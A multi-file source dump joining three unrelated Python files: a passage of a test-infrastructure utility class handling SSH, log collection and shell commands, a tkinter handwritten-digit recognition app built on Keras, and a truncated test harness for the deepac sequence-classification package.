@wraps(f)
def wrapped(*args, **kwargs):
global _stepdepth
_stepdepth += 1
logger.debug("{} entering {} {}".format(Format.DOT * _stepdepth, f.__name__,
f.__doc__ or ""))
r = f(*args, **kwargs)
logger.debug("{} exiting {}".format(
Format.DOT_EXIT * _stepdepth, f.__name__))
_stepdepth -= 1
return r
return wrapped
class Utils:
def __init__(self, conf):
self.conf = conf
@staticmethod
def chmod_recursive(directory, permissions):
os.chmod(directory, permissions)
for file in glob.glob(os.path.join(directory, "**/*"), recursive=True):
try:
os.chmod(file, permissions)
except Exception as ex:
logger.debug(ex)
@staticmethod
def cleanup_file(file):
if os.path.exists(file):
logger.debug(f"Cleaning up {file}")
try:
try:
# Attempt to remove the file first, because a socket (e.g.
# ssh-agent) is not a file but has to be removed like one.
os.remove(file)
except IsADirectoryError:
shutil.rmtree(file)
except Exception as ex:
logger.debug(ex)
else:
logger.debug(f"Nothing to clean up for {file}")
@staticmethod
def cleanup_files(files):
"""Remove any files or dirs in a list if they exist"""
for file in files:
Utils.cleanup_file(file)
def ssh_cleanup(self):
"""Remove ssh sock files"""
# TODO: also kill ssh agent here? maybe move pkill to kill_ssh_agent()?
sock_file = self.ssh_sock_fn()
sock_dir = os.path.dirname(sock_file)
try:
Utils.cleanup_file(sock_file)
# also remove tempdir if it's empty afterwards
if 0 == len(os.listdir(sock_dir)):
os.rmdir(sock_dir)
else:
logger.warning(f"Dir {sock_dir} not empty; leaving it")
except FileNotFoundError:
pass
except OSError as ex:
logger.debug(ex)
def collect_remote_logs(self, ip_address, logs, store_path):
"""
Collect logs from a remote machine
:param ip_address: (str) IP of the machine to collect the logs from
:param logs: (dict: list) The different logs to collect {"files": [], "dirs": [], ""services": []}
:param store_path: (str) Path to copy the logs to
:return: (bool) True if there was an error while collecting the logs
"""
logging_errors = False
for log in logs.get("files", []):
try:
self.scp_file(ip_address, log, store_path)
except Exception as ex:
logger.debug(
f"Error while collecting {log} from {ip_address}\n {ex}")
logging_errors = True
for log in logs.get("dirs", []):
try:
self.rsync(ip_address, log, store_path)
except Exception as ex:
logger.debug(
f"Error while collecting {log} from {ip_address}\n {ex}")
logging_errors = True
for service in logs.get("services", []):
try:
self.ssh_run(
ip_address, f"sudo journalctl -xeu {service} > {service}.log")
self.scp_file(ip_address, f"{service}.log", store_path)
except Exception as ex:
logger.debug(
f"Error while collecting {service}.log from {ip_address}\n {ex}")
logging_errors = True
return logging_errors
def authorized_keys(self):
public_key_path = self.conf.terraform.ssh_key + ".pub"
os.chmod(self.conf.terraform.ssh_key, 0o400)
with open(public_key_path) as f:
pubkey = f.read().strip()
return pubkey
def ssh_run(self, ipaddr, cmd):
key_fn = self.conf.terraform.ssh_key
cmd = "ssh " + Constant.SSH_OPTS + " -i {key_fn} {username}@{ip} -- '{cmd}'".format(
key_fn=key_fn, ip=ipaddr, cmd=cmd, username=self.conf.terraform.nodeuser)
return self.runshellcommand(cmd)
def scp_file(self, ip_address, remote_file_path, local_file_path):
"""
Copies a remote file from the given ip to the give path
:param ip_address: (str) IP address of the node to copy from
:param remote_file_path: (str) Path of the file to be copied
:param local_file_path: (str) Path where to store the log
:return:
"""
cmd = (f"scp {Constant.SSH_OPTS} -i {self.conf.terraform.ssh_key}"
f" {self.conf.terraform.nodeuser}@{ip_address}:{remote_file_path} {local_file_path}")
self.runshellcommand(cmd)
def rsync(self, ip_address, remote_dir_path, local_dir_path):
"""
Copies a remote dir from the given ip to the give path
:param ip_address: (str) IP address of the node to copy from
:param remote_dir_path: (str) Path of the dir to be copied
:param local_dir_path: (str) Path where to store the dir
:return:
"""
cmd = (f'rsync -avz --no-owner --no-perms -e "ssh {Constant.SSH_OPTS} -i {self.conf.terraform.ssh_key}" '
f'--rsync-path="sudo rsync" --ignore-missing-args {self.conf.terraform.nodeuser}@{ip_address}:{remote_dir_path} '
f'{local_dir_path}')
self.runshellcommand(cmd)
def runshellcommand(self, cmd, cwd=None, env={}, ignore_errors=False, stdin=None):
"""Running shell command in {workspace} if cwd == None
Eg) cwd is "skuba", cmd will run shell in {workspace}/skuba/
cwd is None, cmd will run in {workspace}
cwd is abs path, cmd will run in cwd
Keyword arguments:
cmd -- command to run
cwd -- dir to run the cmd
env -- environment variables
ignore_errors -- don't raise exception if command fails
stdin -- standard input for the command in bytes
"""
if not cwd:
cwd = self.conf.workspace
if not os.path.isabs(cwd):
cwd = os.path.join(self.conf.workspace, cwd)
if not os.path.exists(cwd):
raise FileNotFoundError(Format.alert("Directory {} does not exists".format(cwd)))
if logging.DEBUG >= logger.level:
logger.debug("Executing command\n"
" cwd: {} \n"
" env: {}\n"
" cmd: {}".format(cwd, str(env) if env else "{}", cmd))
else:
logger.info("Executing command {}".format(cmd))
stdout, stderr = [], []
p = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd,
stdin=subprocess.PIPE if stdin else None, shell=True, env=env
)
if stdin:
p.stdin.write(stdin)
p.stdin.close()
stdoutStreamer = Thread(target = self.read_fd, args = (p, p.stdout, logger.debug, stdout))
stderrStreamer = Thread(target = self.read_fd, args = (p, p.stderr, logger.error, stderr))
stdoutStreamer.start()
stderrStreamer.start()
stdoutStreamer.join()
stderrStreamer.join()
# this is redundant, at this point threads were joined and they waited for the subprocess
# to exit, however it should not hurt to explicitly wait for it again (no-op).
p.wait()
stdout, stderr = "".join(stdout), "".join(stderr)
if p.returncode != 0:
if not ignore_errors:
raise RuntimeError("Error executing command {}".format(cmd))
else:
return stderr
return stdout
def ssh_sock_fn(self):
"""generate path to ssh socket
A socket path can't be over 107 chars on Linux, so generate a short
hash of the workspace and use that in $TMPDIR (usually /tmp) so we have
a predictable, test-unique, fixed-length path.
"""
path = os.path.join(
gettempdir(),
hashlib.md5(self.conf.workspace.encode()).hexdigest(),
"ssh-agent-sock"
)
maxl = 107
if len(path) > maxl:
raise Exception(f"Socket path '{path}' len {len(path)} > {maxl}")
return path
def read_fd(self, proc, fd, logger_func, output):
"""Read from fd, logging using logger_func
Read from fd, until proc is finished. All contents will
also be appended onto output."""
while True:
contents = fd.readline().decode()
if contents == '' and proc.poll() is not None:
return
if contents:
output.append(contents)
logger_func(contents.strip())
@timeout(60)
@step
def setup_ssh(self):
os.chmod(self.conf.terraform.ssh_key, 0o400)
# use a dedicated agent to minimize stateful components
sock_fn = self.ssh_sock_fn()
# be sure directory containing socket exists and socket doesn't exist
if os.path.exists(sock_fn):
try:
if os.path.isdir(sock_fn):
os.path.rmdir(sock_fn) # rmdir only removes an empty dir
else:
os.remove(sock_fn)
except FileNotFoundError:
pass
try:
os.mkdir(os.path.dirname(sock_fn), mode=0o700)
except FileExistsError:
if os.path.isdir(os.path.dirname(sock_fn)):
pass
else:
raise
# clean up old ssh agent process(es)
try:
self.runshellcommand("pkill -f 'ssh-agent -a {}'".format(sock_fn))
logger.warning("Killed previous instance of ssh-agent")
except:
pass
self.runshellcommand("ssh-agent -a {}".format(sock_fn))
self.runshellcommand(
"ssh-add " + self.conf.terraform.ssh_key, env={"SSH_AUTH_SOCK": sock_fn})
@timeout(30)
@step
def info(self):
"""Node info"""
info_lines = "Env vars: {}\n".format(sorted(os.environ))
info_lines += self.runshellcommand('ip a')
info_lines += self.runshellcommand('ip r')
info_lines += self.runshellcommand('cat /etc/resolv.conf')
# TODO: the logic for retrieving external is platform depedant and should be
# moved to the corresponding platform
try:
r = requests.get(
'http://169.254.169.254/2009-04-04/meta-data/public-ipv4', timeout=2)
r.raise_for_status()
except (requests.HTTPError, requests.Timeout) as err:
logger.warning(
f'Meta Data service unavailable could not get external IP addr{err}')
else:
info_lines += 'External IP addr: {}'.format(r.text)
return info_lines
|
App.py
|
# TO-DO:-
# 1. Doesn't predict after refreshing of the dataset.
# 2. train data on go: collect at least 5-6 data and then train
# 3. improve performance
# 4. More features.
# 5. test it
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
from tkinter.font import Font
from PIL import ImageTk, Image, ImageDraw
import cv2
import threading
import numpy as np
import tensorflow as tf
import Dataset
import Model
import time
# ----------------------------------------------------------------- #
class GuiLoop():
def __init__(self, root, master, parameters=None, count=True, speed=100):
self.Brk = False
self.root = root
self.master = master
self.para = parameters
self.count = count
self._reset = count
self.speed = speed
self.task = ''
self._Loop()
def __call__(self, root, master, parameters=None, count=True, speed=100):
self.Brk = False
self.root = root
self.master = master
self.para = parameters
self.count = count
self._reset = count
self.speed = speed
self.task = ''
self.StopLoop()
self._Loop()
def config(self, **options):
self.master = options.get('master')
self.count = options.get('count',True)
self._reset = options.get('count',True)
self.speed = options.get('speed')
def _Loop(self):
if self.__run__() and self.master!=None and not self.Brk:
if self.para:self.master(self.para)
else: self.master()
self.task = self.root.after(self.speed, self._Loop)
def __run__(self):
if self.count==True and type(self.count)==bool:
return True
elif self.count==False and type(self.count)==bool:
return False
if type(self.count)==int:
if self.count>0:
self.count-=1
return True
else:
return False
else:
print("\nInvaild Entry count can't be {} ,\
Either boolean or int".format(self.count))
def StopLoop(self, evt=None):
self.root.after_cancel(self.task)
self.count = self._reset
self.master = None
self.para = None
def Pause(self, evt=None):
self.Brk=True
self.root.after_cancel(self.task)
def Play(self, evt=None):
self.Brk=False
self._Loop()
# Loadinf animation
class Loading_Ani(Canvas):
def __init__(self, root=None, speed=100, size=80, color="#333", bg=None):
Canvas.__init__(self, root, bg=bg)
self.config(self, highlightthickness=0, width=size, height=size)
self.create_text(size/2,(size/2), text="◜",fill=color, tags="Loading", font=Font(size=size+8))
self.__ = 0
self._loop = GuiLoop(self, self.Magic, speed=speed)
def Magic(self, evt=None):
if self.__==0:
self.itemconfig("Loading", text="◜")
self.__=1
elif self.__ ==1:
self.itemconfig("Loading", text="◝")
self.__=2
elif self.__ ==2:
self.itemconfig("Loading", text="◞")
self.__=3
elif self.__ ==3:
self.itemconfig("Loading", text="◟")
self.__=0
def hide(self):
self._loop.Pause()
self.itemconfig('Loading', state='hidden')
def show(self):
self._loop.Play()
self.itemconfig('Loading', state='normal')
# ----------------------------------------------------------------- #
graph = ''
model = ''
def load_model():
global model, graph
graph = tf.get_default_graph()
model = tf.keras.models.load_model("Digit_Reader1.h5")
load_model()
class Draw_Pad(Canvas):
def __init__(self, master, Width = 20, color = "white" ,*ag, **kw):
Canvas.__init__(self, master, *ag, **kw)
self.config(bg="#333", highlightthickness=1)
self.master = master
self.width = Width
self.color = color
self.train_count = 0
self.ThreadsL = []
self.Loading = False
self.Img = Image.new( "RGB", ( 300,300 ), (0,0,0) )
self.get_draw = ImageDraw.Draw( self.Img )
self.model = model
self.display_win()
self.master.bind("<Shift-Return>", self.Delete)
self.master.bind("<Button-2>", self.Delete)
self.master.bind("<Return>", self.predict)
self.bind("<B1-Motion>", self.draw)
self.Load_ani = Loading_Ani(self.master, speed=50, color="white", size=40, bg="#333")
self.Load_ani.place(relx=0.85, rely=0.9)
self.Load_ani.hide()
self.master.update()
self.after(100, self.details_help)
def details_help(self, evt=None):
messagebox.showinfo("Important Information",
"""
This is a Machine Learning Model
based on the Keras algorithm.
What does this do?
We can Recognise Hand-Written
digits from this model and can
also Train more.
How do I use?
1. Draw the digit on blank space.
2. Press Enter / Return key to predict.
3. Press Shift + Enter / Return key or
the Right Mouse Click to clear
the drawing.
Developed By :- Saad Mairaj
([email protected])
(6 February 2019)
""")
self.master.grab_set()
def Reser_Data(self, evt):
self.Load_ani.show()
Dataset.dataset_1()
Dataset.dataset_2()
self.after(200)
def Load():
self.master.bind("<Return>", lambda _: messagebox.showinfo("Message",
"Cannot predict while the model is traing or refreshing"))
acc = Model.Train_Digit()
self.Acc.config(text="Acc: {}".format(acc))
self.update()
tf.keras.backend.clear_session()
load_model()
self.Load_ani.hide()
self.master.bind("<Return>", self.predict)
self.Thread2 = threading.Thread(target=Load)
self.Thread2.start()
def display_win(self, evt=None):
self.display = Canvas(self.master, bg="#333", width=300,
height=100, highlightthickness=0)
self.display.pack_propagate(0)
self.display.pack(side=BOTTOM)
self.L1 = Label(self.display, text = "Prediction: ",
font=("","15", "bold"), bg="#333", fg="white")
self.L1.pack(pady=5)
self.Ent = Entry(self.display, bg="#333", fg="white")
self.Ent.unbind_class("Entry", "<Key>")
def Check_charlimit(evt):
if evt.char in "0123456789":
self.Ent.delete(0, END)
self.Ent.insert(0, evt.char)
if evt.keysym == "backspace":
self.Ent.delete(0, END)
self.EntHide = Label(self.display, width=22, height=22, bg="#333")
self.EntHide.place(relx = 0.8, rely=0.1, height=20, width=20)
self.Ent.bind("<Key>", Check_charlimit)
self.style = ttk.Style()
self.style.configure('TCheckbutton', font=("","10"))
self.CkCmd = IntVar()
self.CkCmd.set(0)
def CkFun():
if self.CkCmd.get():
messagebox.showwarning("Warning",
"""Training the model is a Beta Version.
Usage:
1) Draw the digit and predict.
2) If the prediction is not correct,
then enter the right digit in the
entry box.
3) If the prediction is correct,
then leave the entry box #333.
""")
self.EntHide.place_forget()
self.Ent.place(relx = 0.8, rely=0.1, height=20, width=20)
self.Ent.lift()
self.display.update_idletasks()
self.display.update()
else:
self.Ent.place_forget()
self.display.update()
self.display.update_idletasks()
self.EntHide.place(relx = 0.8, rely=0.1, height=20, width=20)
self.Ckb = ttk.Checkbutton(self.display, style="TCheckbutton",
text="Train The Model", variable=self.CkCmd, onvalue=1,
offvalue=0, command=CkFun)
self.Ckb.pack(pady=5)
self.Acc = Label(self, text="Acc: {}".format(97.22),
fg="white", bg="#333", font=("", 10))
self.Acc.place(x=10, y=10)
self.Restart = Label(self, text="⟲", bg="#333", fg="white",
font=("","16"))
self.Restart.place(x=260, y=10)
self.Restart.bind("<Enter>", lambda _: self.Restart.config(fg="red"))
self.Restart.bind("<Leave>", lambda _: self.Restart.config(fg="white"))
self.Restart.bind("<Button-1>", self.Reser_Data)
self.HelpL = Label(self.display, text="ⓘ", fg="white", bg="#333")
self.HelpL.place(x=10, y=10)
self.HelpL.bind("<Enter>", lambda _: self.HelpL.config(fg="red"))
self.HelpL.bind("<Leave>", lambda _: self.HelpL.config(fg="white"))
self.HelpL.bind("<Button-1>", lambda _: self.HelpL.config(fg="white"))
self.HelpL.bind("<Button-1>", self.details_help, "+")
def draw(self, evt):
x1 = evt.x
y1 = evt.y
x2 = evt.x + self.width
y2 = evt.y + self.width
self.create_oval( x1, y1, x2, y2,
fill=self.color, outline=self.color )
self.get_draw.ellipse( [x1,y1, x2,y2], fill="white" )
def predict(self, evt):
self.Img.save("Yo.png")
self.Img_arr = cv2.imread("Yo.png", cv2.IMREAD_GRAYSCALE)
self.Img_arr = cv2.resize( self.Img_arr, (28,28) )
self.New_arr = self.Img_arr.reshape(-1, 28, 28, 1)
with graph.as_default():
pre = self.model.predict( [self.New_arr] )
pre = np.argmax(pre[0])
print("\n", pre, "\n")
self.L1.config( text="Prediction: {}".format(pre) )
self.master.update()
if self.Ent.get():
pre = int(self.Ent.get())
print(pre)
if self.CkCmd.get():
Dataset.add(self.Img_arr, pre)
self.train_count+=1
if self.train_count >= 6 :
def Train():
self.Restart.bind("<Button-1>", lambda _: messagebox.showinfo("Message",
"Cannot perform this action while the model is already training"))
self.Load_ani.show()
acc = Model.Train_Digit()
self.Acc.config(text="Acc: {}".format(acc))
self.Load_ani.hide()
self.Restart.bind("<Button-1>", self.Reser_Data)
self.master.update()
self.Thread = threading.Thread(target=Train)
self.ThreadsL.append(self.Thread)
if not self.ThreadsL[0].isAlive():
self.Thread.start()
self.train_count = 0
self.ThreadsL.clear()
self.ThreadsL.append(self.Thread)
self.Loading = True
self.train_count = 0
if self.ThreadsL and self.Loading:
if not self.ThreadsL[0].isAlive():
self.master.bind("<Return>", lambda _: messagebox.showinfo("Message",
"Please wait while the model is still loading"))
load_model()
self.model = model
self.master.bind("<Return>", self.predict)
self.Loading = False
self.master.update()
self.master.update_idletasks()
def Delete(self, evt):
self.delete("all")
self.Img = Image.new( "RGB", ( 300,300 ), (0,0,0) )
self.get_draw = ImageDraw.Draw( self.Img )
if __name__ == "__main__":
root = Tk()
root.resizable(0,0)
root.title("Digit Recognition")
root.config(bg="#333", highlightthickness=2)
root.update_idletasks()
x_cord = int( (root.winfo_screenwidth() / 2) - 150 )
y_cord = int( (root.winfo_screenheight() / 2) - 250 )
root.geometry("300x400+{}+{}".format(x_cord, y_cord))
win = Draw_Pad(root, width=300, height=300)
win.pack(side=TOP)
root.mainloop()
|
testcalls.py
|
import tensorflow as tf
from deepac.predict import predict_fasta, filter_fasta
from deepac.nn_train import RCConfig, RCNet
from deepac.eval.eval import evaluate_reads
from deepac.eval.eval_ens import evaluate_ensemble
from deepac.convert import convert_cudnn
from deepac import preproc
from deepac.tests import datagen
from deepac.tests.rctest import compare_rc
from deepac.builtin_loading import BuiltinLoader
from deepac import __file__
from deepac.explain.tests import ExplainTester
from deepac.gwpa.tests import GWPATester
from multiprocessing import Process
import configparser
import os
class Tester:
"""
Tester class.
"""
def __init__(self, n_cpus=8, builtin_configs=None, builtin_weights=None, explain=False, gwpa=False, do_all=False,
do_quick=False, keep=False, scale=1, tpu_resolver=None, input_modes=None, additivity_check=False,
large=False):
self.n_cpus = n_cpus
self.builtin_configs = builtin_configs
self.builtin_weights = builtin_weights
self.bloader = BuiltinLoader(builtin_configs, builtin_weights)
self.explain = explain
self.gwpa = gwpa
self.do_all = do_all
self.do_quick = do_quick
self.keep = keep
self.scale = scale
self.tpu_resolver = tpu_resolver
self.additivity_check = additivity_check
self.do_large = large
self.test_config = "nn-test-L.ini" if self.do_large else "nn-test.ini"
# all by default, unless using a TPU when it defaults to memory
self.input_modes = ["memory"] if tpu_resolver is not None and input_modes is None else input_modes
# all are true by default, unless input_modes is specified
do_sequence_input = self.input_modes is None or "sequence" in input_modes
if float(tf.__version__[:3]) == 2.2:
print('Disabling keras Sequence input in TF 2.2.')
do_sequence_input = False
self.input_modes_dict = {"memory": self.input_modes is None or "memory" in input_modes,
"sequence": do_sequence_input,
"tfdata": self.input_modes is None or "tfdata" in input_modes}
def run_datagen(self, npy=True, tfrec=True):
print("TEST: Generating data...")
datagen.generate_sample_data(n_train=1024 * self.scale, n_val=1024 * self.scale)
print("TEST: Preprocessing data...")
self.test_preproc(npy, tfrec)
def run_tests(self):
"""Generate sample data and run all tests."""
if not self.keep and os.path.exists("deepac-tests"):
print("Deleting previous test output...")
for root, dirs, files in os.walk("deepac-tests", topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
quick = self.do_quick or self.explain or self.gwpa
gwpatester = None
if not self.keep:
self.run_datagen(npy=True,
tfrec=self.input_modes_dict["tfdata"])
print("TEST: Training...")
self.test_train(quick)
print("TEST: Predicting...")
self.test_pred(quick)
print("TEST: Evaluating...")
self.test_eval()
print("TEST: Converting...")
self.test_convert()
print("TEST: Continuing training...")
self.test_train(quick=True, epoch_start=2, epoch_end=4)
print("TEST: Filtering...")
self.test_filter()
if self.do_all or self.gwpa:
gwpatester = GWPATester(self.n_cpus, self.additivity_check)
print("X-TEST: gff2genome...")
gwpatester.test_gff2genome()
print("X-TEST: Fragmenting genomes...")
gwpatester.test_fragment()
print("X-TEST: Genome-wide phenotype potential map...")
gwpatester.test_genomemap()
print("X-TEST: Gene ranking...")
gwpatester.test_granking()
print("X-TEST: Filter activations...")
gwpatester.test_factiv()
print("X-TEST: Filter enrichment...")
gwpatester.test_fenrichment()
if self.do_all or self.explain:
explaintester = ExplainTester(self.n_cpus, self.additivity_check)
print("X-TEST: Maxact (DeepBind)...")
explaintester.test_maxact()
# SHAP
print("X-TEST: Filter contributions (DeepLIFT)...")
explaintester.test_fcontribs()
print("X-TEST: Filter ranking...")
explaintester.test_franking()
print("X-TEST: fa2transfac...")
explaintester.test_fa2transfac()
print("X-TEST: Weblogos...")
explaintester.test_weblogos()
print("X-TEST: Extended weblogos...")
explaintester.test_weblogos_extended()
print("X-TEST: transfac2IC...")
explaintester.test_transfac2ic()
print("X-TEST: Motif comparison...")
explaintester.test_motif_compare()
if self.do_all or self.gwpa:
print("X-TEST: Nucleotide contribution map...")
gwpatester.test_ntcontribs()
print("TEST: OK")
def test_preproc(self, npy=True, tfrec=True):
"""Test preprocessing."""
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", "preproc-train.ini"))
if npy:
config['Options']['Use_TFData'] = "False"
preproc.preproc(config)
assert (os.path.isfile(os.path.join("deepac-tests", "sample_train_data.npy"))), "Preprocessing failed."
assert (os.path.isfile(os.path.join("deepac-tests", "sample_train_labels.npy"))), "Preprocessing failed."
if tfrec:
config['Options']['Use_TFData'] = "True"
config['Options']['Do_shuffle'] = "True"
p = Process(target=preproc.preproc, args=(config,))
p.start()
p.join()
assert (os.path.isfile(os.path.join("deepac-tests", "sample_train_data",
"sample_train_data_0-{}.tfrec".format(128*self.scale-1)))),\
"TFData Preprocessing failed."
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", "preproc-val.ini"))
if npy:
config['Options']['Use_TFData'] = "False"
preproc.preproc(config)
assert (os.path.isfile(os.path.join("deepac-tests", "sample_val_data.npy"))), "Preprocessing failed."
assert (os.path.isfile(os.path.join("deepac-tests", "sample_val_labels.npy"))), "Preprocessing failed."
if tfrec:
config['Options']['Use_TFData'] = "True"
config['Options']['Do_shuffle'] = "True"
p = Process(target=preproc.preproc, args=(config,))
p.start()
p.join()
assert (os.path.isfile(os.path.join("deepac-tests", "sample_val_data",
"sample_val_data_0-{}.tfrec".format(128*self.scale-1)))),\
"TFData Preprocessing failed."
def test_train(self, quick=False, epoch_start=0, epoch_end=2):
"""Test training."""
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", self.test_config))
if self.input_modes_dict["memory"]:
print("TEST: Training (custom - .npy in memory)...")
config['DataLoad']['Use_TFData'] = "False"
config['DataLoad']['LoadTrainingByBatch'] = "False"
paprconfig = RCConfig(config)
self.__config_train(paprconfig, epoch_start, epoch_end).train()
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"training-deepac-test.csv"))), "Training failed."
if self.input_modes_dict["sequence"]:
print("TEST: Training (custom - keras sequence)...")
config['DataLoad']['Use_TFData'] = "False"
config['DataLoad']['LoadTrainingByBatch'] = "True"
paprconfig = RCConfig(config)
self.__config_train(paprconfig, epoch_start, epoch_end).train()
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"training-deepac-test.csv"))), "Training failed."
if self.input_modes_dict["tfdata"]:
print("TEST: Training (custom - tfrecord)...")
config['DataLoad']['Use_TFData'] = "True"
paprconfig = RCConfig(config)
self.__config_train(paprconfig, epoch_start, epoch_end).train()
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"training-deepac-test.csv"))), "Training failed."
if not quick:
if self.input_modes_dict["memory"]:
print("TEST: Training (rapid - .npy in memory)...")
paprconfig = self.bloader.get_rapid_training_config()
paprconfig.use_tf_data = False
paprconfig.use_generators_keras = False
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
if self.input_modes_dict["sequence"]:
print("TEST: Training (rapid - keras sequence)...")
paprconfig = self.bloader.get_rapid_training_config()
paprconfig.use_tf_data = False
paprconfig.use_generators_keras = True
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
if self.input_modes_dict["tfdata"]:
print("TEST: Training (rapid - tfrecord)...")
paprconfig = self.bloader.get_rapid_training_config()
paprconfig.use_tf_data = True
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
if self.input_modes_dict["memory"]:
print("TEST: Training (sensitive - .npy in memory)...")
paprconfig = self.bloader.get_sensitive_training_config()
paprconfig.use_tf_data = False
paprconfig.use_generators_keras = False
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
if self.input_modes_dict["sequence"]:
print("TEST: Training (sensitive - keras sequence)...")
paprconfig = self.bloader.get_sensitive_training_config()
paprconfig.use_tf_data = False
paprconfig.use_generators_keras = True
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
if self.input_modes_dict["tfdata"]:
print("TEST: Training (sensitive - tfrecord)...")
paprconfig = self.bloader.get_sensitive_training_config()
paprconfig.use_tf_data = True
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
def __config_train(self, paprconfig, epoch_start=0, epoch_end=2):
"""Set sample data paths and compile."""
if paprconfig.use_tf_data and tf.executing_eagerly():
paprconfig.x_train_path = os.path.join("deepac-tests", "sample_train_data")
paprconfig.y_train_path = os.path.join("deepac-tests", "sample_train_labels")
paprconfig.x_val_path = os.path.join("deepac-tests", "sample_val_data")
paprconfig.y_val_path = os.path.join("deepac-tests", "sample_val_labels")
else:
paprconfig.x_train_path = os.path.join("deepac-tests", "sample_train_data.npy")
paprconfig.y_train_path = os.path.join("deepac-tests", "sample_train_labels.npy")
paprconfig.x_val_path = os.path.join("deepac-tests", "sample_val_data.npy")
paprconfig.y_val_path = os.path.join("deepac-tests", "sample_val_labels.npy")
paprconfig.epoch_start = epoch_start
paprconfig.epoch_end = epoch_end
paprconfig.log_superpath = "deepac-tests"
paprconfig.log_dir = paprconfig.log_superpath + "/{runname}-logs".format(runname=paprconfig.runname)
paprconfig.set_tpu_resolver(self.tpu_resolver)
paprnet = RCNet(paprconfig)
paprnet.load_data()
paprnet.compile_model()
return paprnet
def test_pred(self, quick=False):
"""Test predicting."""
print("TEST: Predicting (custom)...")
model = tf.keras.models.load_model(os.path.join("deepac-tests", "deepac-test-logs", "deepac-test-e002.h5"))
compare_rc(model, os.path.join("deepac-tests", "sample_val_data.npy"),
os.path.join("deepac-tests", "deepac-test-logs", "deepac-test-e002-predictions-sample_val.npy"),
replicates=1)
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e002-predictions-sample_val.npy"))), "Prediction failed."
if not quick:
